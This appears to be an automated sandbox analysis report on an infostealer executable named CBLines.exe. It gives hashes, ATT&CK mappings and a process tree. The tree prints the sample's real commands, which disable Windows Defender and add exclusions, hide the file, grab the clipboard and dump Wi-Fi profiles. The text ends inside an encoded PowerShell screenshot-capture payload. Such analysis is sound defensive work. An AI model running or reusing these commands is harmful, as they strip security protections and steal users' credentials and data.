e461f6d4f4386add20a92e5e0a057b1b2373cf598ecb585f0b3c7a187070ad82

Resubmissions

08/10/2024, 11:02

241008-m5dx6szdjb 10

08/10/2024, 10:55

241008-m1mphstejj 10

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08/10/2024, 10:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CBLines.exe
Size

6.8MB
MD5

3007ee10af667a5b7a08383e1075ffeb
SHA1

235a92053da4068ffc5071f5c7283aabc1eacd15
SHA256

e461f6d4f4386add20a92e5e0a057b1b2373cf598ecb585f0b3c7a187070ad82
SHA512

b0a61f79c904d1cfec1c12a3335e8af04e6849671793f8dc2840d4f2b25f698b4712c576cf7228975fab72c820f5367f1822947eefb1db932e5c20de9cf32318
SSDEEP

98304:EnkwN+MdA5wqMmSd8MMhJMjarJaon7JPzf+JiUCS3swhzqgez7DoDZDJ1n6hBnLD:EnV1J+B6ylnlPzf+JiJCsmFMvcn6hVvX

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1820	powershell.exe
4368	powershell.exe
4544	powershell.exe
1208	powershell.exe
1784	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	CBLines.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4300	cmd.exe
3224	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4260	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe
1656	CBLines.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
672	tasklist.exe
3976	tasklist.exe
5028	tasklist.exe
1848	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3700	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b81-21.dat	upx
behavioral2/memory/1656-25-0x00007FF901770000-0x00007FF901D5A000-memory.dmp	upx
behavioral2/files/0x000a000000023b74-27.dat	upx
behavioral2/files/0x000a000000023b7f-31.dat	upx
behavioral2/memory/1656-30-0x00007FF915440000-0x00007FF915463000-memory.dmp	upx
behavioral2/files/0x000a000000023b7b-48.dat	upx
behavioral2/files/0x000a000000023b7a-47.dat	upx
behavioral2/memory/1656-46-0x00007FF91A920000-0x00007FF91A92F000-memory.dmp	upx
behavioral2/files/0x000a000000023b79-45.dat	upx
behavioral2/files/0x000a000000023b78-44.dat	upx
behavioral2/files/0x000a000000023b77-43.dat	upx
behavioral2/files/0x000a000000023b76-42.dat	upx
behavioral2/files/0x000a000000023b75-41.dat	upx
behavioral2/files/0x000a000000023b73-40.dat	upx
behavioral2/files/0x000a000000023b86-39.dat	upx
behavioral2/files/0x000a000000023b85-38.dat	upx
behavioral2/files/0x000a000000023b84-37.dat	upx
behavioral2/files/0x000a000000023b80-34.dat	upx
behavioral2/files/0x000a000000023b7e-33.dat	upx
behavioral2/memory/1656-54-0x00007FF911800000-0x00007FF91182D000-memory.dmp	upx
behavioral2/memory/1656-56-0x00007FF9167D0000-0x00007FF9167E9000-memory.dmp	upx
behavioral2/memory/1656-58-0x00007FF911100000-0x00007FF911123000-memory.dmp	upx
behavioral2/memory/1656-60-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp	upx
behavioral2/memory/1656-62-0x00007FF9166C0000-0x00007FF9166D9000-memory.dmp	upx
behavioral2/memory/1656-64-0x00007FF9153C0000-0x00007FF9153CD000-memory.dmp	upx
behavioral2/memory/1656-66-0x00007FF911070000-0x00007FF91109E000-memory.dmp	upx
behavioral2/memory/1656-70-0x00007FF901770000-0x00007FF901D5A000-memory.dmp	upx
behavioral2/memory/1656-74-0x00007FF915440000-0x00007FF915463000-memory.dmp	upx
behavioral2/memory/1656-73-0x00007FF901240000-0x00007FF9015B5000-memory.dmp	upx
behavioral2/memory/1656-71-0x00007FF90B890000-0x00007FF90B948000-memory.dmp	upx
behavioral2/memory/1656-76-0x00007FF910B00000-0x00007FF910B14000-memory.dmp	upx
behavioral2/memory/1656-78-0x00007FF911800000-0x00007FF91182D000-memory.dmp	upx
behavioral2/memory/1656-79-0x00007FF9153B0000-0x00007FF9153BD000-memory.dmp	upx
behavioral2/memory/1656-84-0x00007FF900DF0000-0x00007FF900F0C000-memory.dmp	upx
behavioral2/memory/1656-83-0x00007FF9167D0000-0x00007FF9167E9000-memory.dmp	upx
behavioral2/memory/1656-129-0x00007FF911100000-0x00007FF911123000-memory.dmp	upx
behavioral2/memory/1656-176-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp	upx
behavioral2/memory/1656-208-0x00007FF9166C0000-0x00007FF9166D9000-memory.dmp	upx
behavioral2/memory/1656-273-0x00007FF911070000-0x00007FF91109E000-memory.dmp	upx
behavioral2/memory/1656-285-0x00007FF90B890000-0x00007FF90B948000-memory.dmp	upx
behavioral2/memory/1656-288-0x00007FF901240000-0x00007FF9015B5000-memory.dmp	upx
behavioral2/memory/1656-300-0x00007FF901770000-0x00007FF901D5A000-memory.dmp	upx
behavioral2/memory/1656-306-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp	upx
behavioral2/memory/1656-301-0x00007FF915440000-0x00007FF915463000-memory.dmp	upx
behavioral2/memory/1656-325-0x00007FF901770000-0x00007FF901D5A000-memory.dmp	upx
behavioral2/memory/1656-350-0x00007FF90B890000-0x00007FF90B948000-memory.dmp	upx
behavioral2/memory/1656-349-0x00007FF911070000-0x00007FF91109E000-memory.dmp	upx
behavioral2/memory/1656-348-0x00007FF9153C0000-0x00007FF9153CD000-memory.dmp	upx
behavioral2/memory/1656-347-0x00007FF9166C0000-0x00007FF9166D9000-memory.dmp	upx
behavioral2/memory/1656-346-0x00007FF901E70000-0x00007FF901FDF000-memory.dmp	upx
behavioral2/memory/1656-345-0x00007FF911100000-0x00007FF911123000-memory.dmp	upx
behavioral2/memory/1656-344-0x00007FF9167D0000-0x00007FF9167E9000-memory.dmp	upx
behavioral2/memory/1656-343-0x00007FF911800000-0x00007FF91182D000-memory.dmp	upx
behavioral2/memory/1656-342-0x00007FF91A920000-0x00007FF91A92F000-memory.dmp	upx
behavioral2/memory/1656-341-0x00007FF915440000-0x00007FF915463000-memory.dmp	upx
behavioral2/memory/1656-340-0x00007FF901240000-0x00007FF9015B5000-memory.dmp	upx
behavioral2/memory/1656-339-0x00007FF900DF0000-0x00007FF900F0C000-memory.dmp	upx
behavioral2/memory/1656-338-0x00007FF9153B0000-0x00007FF9153BD000-memory.dmp	upx
behavioral2/memory/1656-337-0x00007FF910B00000-0x00007FF910B14000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2968	cmd.exe
3400	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
516	cmd.exe
4784	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2252	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5076	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3400	PING.EXE

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
1208	powershell.exe
1208	powershell.exe
4544	powershell.exe
4544	powershell.exe
1784	powershell.exe
1784	powershell.exe
3224	powershell.exe
3224	powershell.exe
404	powershell.exe
404	powershell.exe
3224	powershell.exe
1208	powershell.exe
1784	powershell.exe
4544	powershell.exe
404	powershell.exe
1820	powershell.exe
1820	powershell.exe
720	powershell.exe
720	powershell.exe
4368	powershell.exe
4368	powershell.exe
3792	powershell.exe
3792	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5028	tasklist.exe
Token: SeDebugPrivilege	3976	tasklist.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeIncreaseQuotaPrivilege	3636	WMIC.exe
Token: SeSecurityPrivilege	3636	WMIC.exe
Token: SeTakeOwnershipPrivilege	3636	WMIC.exe
Token: SeLoadDriverPrivilege	3636	WMIC.exe
Token: SeSystemProfilePrivilege	3636	WMIC.exe
Token: SeSystemtimePrivilege	3636	WMIC.exe
Token: SeProfSingleProcessPrivilege	3636	WMIC.exe
Token: SeIncBasePriorityPrivilege	3636	WMIC.exe
Token: SeCreatePagefilePrivilege	3636	WMIC.exe
Token: SeBackupPrivilege	3636	WMIC.exe
Token: SeRestorePrivilege	3636	WMIC.exe
Token: SeShutdownPrivilege	3636	WMIC.exe
Token: SeDebugPrivilege	3636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3636	WMIC.exe
Token: SeRemoteShutdownPrivilege	3636	WMIC.exe
Token: SeUndockPrivilege	3636	WMIC.exe
Token: SeManageVolumePrivilege	3636	WMIC.exe
Token: 33	3636	WMIC.exe
Token: 34	3636	WMIC.exe
Token: 35	3636	WMIC.exe
Token: 36	3636	WMIC.exe
Token: SeDebugPrivilege	4544	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1848	tasklist.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeIncreaseQuotaPrivilege	3636	WMIC.exe
Token: SeSecurityPrivilege	3636	WMIC.exe
Token: SeTakeOwnershipPrivilege	3636	WMIC.exe
Token: SeLoadDriverPrivilege	3636	WMIC.exe
Token: SeSystemProfilePrivilege	3636	WMIC.exe
Token: SeSystemtimePrivilege	3636	WMIC.exe
Token: SeProfSingleProcessPrivilege	3636	WMIC.exe
Token: SeIncBasePriorityPrivilege	3636	WMIC.exe
Token: SeCreatePagefilePrivilege	3636	WMIC.exe
Token: SeBackupPrivilege	3636	WMIC.exe
Token: SeRestorePrivilege	3636	WMIC.exe
Token: SeShutdownPrivilege	3636	WMIC.exe
Token: SeDebugPrivilege	3636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3636	WMIC.exe
Token: SeRemoteShutdownPrivilege	3636	WMIC.exe
Token: SeUndockPrivilege	3636	WMIC.exe
Token: SeManageVolumePrivilege	3636	WMIC.exe
Token: 33	3636	WMIC.exe
Token: 34	3636	WMIC.exe
Token: 35	3636	WMIC.exe
Token: 36	3636	WMIC.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeDebugPrivilege	672	tasklist.exe
Token: SeDebugPrivilege	1820	powershell.exe
Token: SeDebugPrivilege	720	powershell.exe
Token: SeIncreaseQuotaPrivilege	1052	WMIC.exe
Token: SeSecurityPrivilege	1052	WMIC.exe
Token: SeTakeOwnershipPrivilege	1052	WMIC.exe
Token: SeLoadDriverPrivilege	1052	WMIC.exe
Token: SeSystemProfilePrivilege	1052	WMIC.exe
Token: SeSystemtimePrivilege	1052	WMIC.exe
Token: SeProfSingleProcessPrivilege	1052	WMIC.exe
Token: SeIncBasePriorityPrivilege	1052	WMIC.exe
Token: SeCreatePagefilePrivilege	1052	WMIC.exe
Token: SeBackupPrivilege	1052	WMIC.exe
Token: SeRestorePrivilege	1052	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5116 wrote to memory of 1656	5116	CBLines.exe	84
PID 5116 wrote to memory of 1656	5116	CBLines.exe	84
PID 1656 wrote to memory of 1512	1656	CBLines.exe	87
PID 1656 wrote to memory of 1512	1656	CBLines.exe	87
PID 1656 wrote to memory of 1916	1656	CBLines.exe	88
PID 1656 wrote to memory of 1916	1656	CBLines.exe	88
PID 1656 wrote to memory of 3700	1656	CBLines.exe	90
PID 1656 wrote to memory of 3700	1656	CBLines.exe	90
PID 1656 wrote to memory of 872	1656	CBLines.exe	93
PID 1656 wrote to memory of 872	1656	CBLines.exe	93
PID 1656 wrote to memory of 2532	1656	CBLines.exe	96
PID 1656 wrote to memory of 2532	1656	CBLines.exe	96
PID 1656 wrote to memory of 1924	1656	CBLines.exe	95
PID 1656 wrote to memory of 1924	1656	CBLines.exe	95
PID 1656 wrote to memory of 4136	1656	CBLines.exe	99
PID 1656 wrote to memory of 4136	1656	CBLines.exe	99
PID 1656 wrote to memory of 4300	1656	CBLines.exe	100
PID 1656 wrote to memory of 4300	1656	CBLines.exe	100
PID 1656 wrote to memory of 1500	1656	CBLines.exe	102
PID 1656 wrote to memory of 1500	1656	CBLines.exe	102
PID 1924 wrote to memory of 3976	1924	cmd.exe	103
PID 1924 wrote to memory of 3976	1924	cmd.exe	103
PID 1656 wrote to memory of 3220	1656	CBLines.exe	152
PID 1656 wrote to memory of 3220	1656	CBLines.exe	152
PID 3700 wrote to memory of 4968	3700	cmd.exe	107
PID 3700 wrote to memory of 4968	3700	cmd.exe	107
PID 1916 wrote to memory of 4544	1916	cmd.exe	108
PID 1916 wrote to memory of 4544	1916	cmd.exe	108
PID 2532 wrote to memory of 5028	2532	cmd.exe	109
PID 2532 wrote to memory of 5028	2532	cmd.exe	109
PID 1656 wrote to memory of 516	1656	CBLines.exe	111
PID 1656 wrote to memory of 516	1656	CBLines.exe	111
PID 1656 wrote to memory of 2400	1656	CBLines.exe	112
PID 1656 wrote to memory of 2400	1656	CBLines.exe	112
PID 1512 wrote to memory of 1208	1512	cmd.exe	113
PID 1512 wrote to memory of 1208	1512	cmd.exe	113
PID 1656 wrote to memory of 880	1656	CBLines.exe	114
PID 1656 wrote to memory of 880	1656	CBLines.exe	114
PID 1656 wrote to memory of 2356	1656	CBLines.exe	117
PID 1656 wrote to memory of 2356	1656	CBLines.exe	117
PID 4136 wrote to memory of 3636	4136	cmd.exe	120
PID 4136 wrote to memory of 3636	4136	cmd.exe	120
PID 872 wrote to memory of 1784	872	cmd.exe	121
PID 872 wrote to memory of 1784	872	cmd.exe	121
PID 3220 wrote to memory of 2436	3220	cmd.exe	122
PID 3220 wrote to memory of 2436	3220	cmd.exe	122
PID 4300 wrote to memory of 3224	4300	cmd.exe	124
PID 4300 wrote to memory of 3224	4300	cmd.exe	124
PID 1500 wrote to memory of 1848	1500	cmd.exe	125
PID 1500 wrote to memory of 1848	1500	cmd.exe	125
PID 1656 wrote to memory of 1424	1656	CBLines.exe	144
PID 1656 wrote to memory of 1424	1656	CBLines.exe	144
PID 516 wrote to memory of 4784	516	cmd.exe	128
PID 516 wrote to memory of 4784	516	cmd.exe	128
PID 2356 wrote to memory of 404	2356	cmd.exe	129
PID 2356 wrote to memory of 404	2356	cmd.exe	129
PID 2400 wrote to memory of 5076	2400	cmd.exe	130
PID 2400 wrote to memory of 5076	2400	cmd.exe	130
PID 880 wrote to memory of 2460	880	cmd.exe	131
PID 880 wrote to memory of 2460	880	cmd.exe	131
PID 1424 wrote to memory of 1704	1424	cmd.exe	132
PID 1424 wrote to memory of 1704	1424	cmd.exe	132
PID 1656 wrote to memory of 4752	1656	CBLines.exe	133
PID 1656 wrote to memory of 4752	1656	CBLines.exe	133

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4968	attrib.exe
5036	attrib.exe
3768	attrib.exe

C:\Users\Admin\AppData\Local\Temp\CBLines.exe
"C:\Users\Admin\AppData\Local\Temp\CBLines.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5116
- C:\Users\Admin\AppData\Local\Temp\CBLines.exe
  "C:\Users\Admin\AppData\Local\Temp\CBLines.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CBLines.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CBLines.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\CBLines.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3700
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\CBLines.exe"
      4⤵
      Views/modifies file attributes
      PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1924
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2532
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4136
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1500
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3220
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:516
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2400
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:880
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9A